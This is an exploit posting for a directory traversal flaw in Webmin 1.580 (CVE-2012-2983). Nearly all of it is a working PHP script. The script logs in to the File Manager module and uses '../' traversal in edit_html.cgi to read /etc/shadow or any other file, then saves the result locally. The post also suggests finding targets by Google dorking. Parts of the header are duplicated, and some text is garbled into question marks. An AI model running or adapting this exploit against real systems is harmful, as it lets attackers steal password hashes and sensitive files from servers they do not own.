Webmin 1.580 Directory Traversal

=============================================================================================================================================
| # Title : Webmin 1.580 =============================================================================================================================================
| # Title : Webmin 1.580 Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://webmin.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: This code is written in PHP and aims to exploit the Directory Traversal vulnerability in Webmin 1.580,

which allows an authenticated user with access to the File Manager Module to read any file on the system with root privileges.

(Related : https://packetstorm.news/files/id/180804/ Linked CVE numbers: CVE-2012-2983 ) .

[+] save code as poc.php.

[+] Set target : line 85

[+] PayLoad :

<?php

class WebminExploit {
private $host;
private $port;
private $username;
private $password;
private $depth;
private $rpath;
private $ssl;
private $session;

public function __construct($host, $port = 10000, $username, $password, $depth = 4, $rpath = "/etc/shadow", $ssl = true) {
$this->host = $host;
$this->port = $port;
$this->username = $username;
$this->password = $password;
$this->depth = $depth;
$this->rpath = $rpath;
$this->ssl = $ssl;
}

public function login() {
$url = ($this->ssl ? "https" : "http") . "://{$this->host}:{$this->port}/session_login.cgi";
$data = http_build_query([
"page" => "/",
"user" => $this->username,
"pass" => $this->password
]);

$opts = [
"http" => [
"method" => "POST",
"header" => "Content-Type: application/x-www-form-urlencoded\r\nCookie: testing=1\r\n",
"content" => $data
]
];

$context = stream_context_create($opts);
$response = file_get_contents($url, false, $context);

if (preg_match('/sid=(\w+);/', implode("\n", $http_response_header), $matches)) {
$this->session = $matches[1];
echo "Authentication successful\n";
return true;
}

echo "Authentication failed\n";
return false;
}

public function retrieveFile() {
if (!$this->session) {
echo "No valid session. Login first.\n";
return;
}

echo "Attempting to retrieve {$this->rpath}...\n";

$traversal = str_repeat("../", $this->depth) . $this->rpath;
$url = ($this->ssl ? "https" : "http") . "://{$this->host}:{$this->port}/file/edit_html.cgi?file={$traversal}&text=1";

$opts = [
"http" => [
"method" => "GET",
"header" => "Cookie: sid={$this->session}\r\n"
]
];

$context = stream_context_create($opts);
$response = file_get_contents($url, false, $context);

if (preg_match('/name=body>(.*?)<\/textarea>/s', $response, $matches)) {
$content = $matches[1];
$filename = basename($this->rpath);
file_put_contents($filename, $content);
echo "{$this->rpath} saved in {$filename}\n";
} else {
echo "Failed to retrieve the file\n";
}
}
}

// ??????? ??????
$exploit = new WebminExploit("target.com", 10000, "admin", "password");
if ($exploit->login()) {
$exploit->retrieveFile();
}





Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================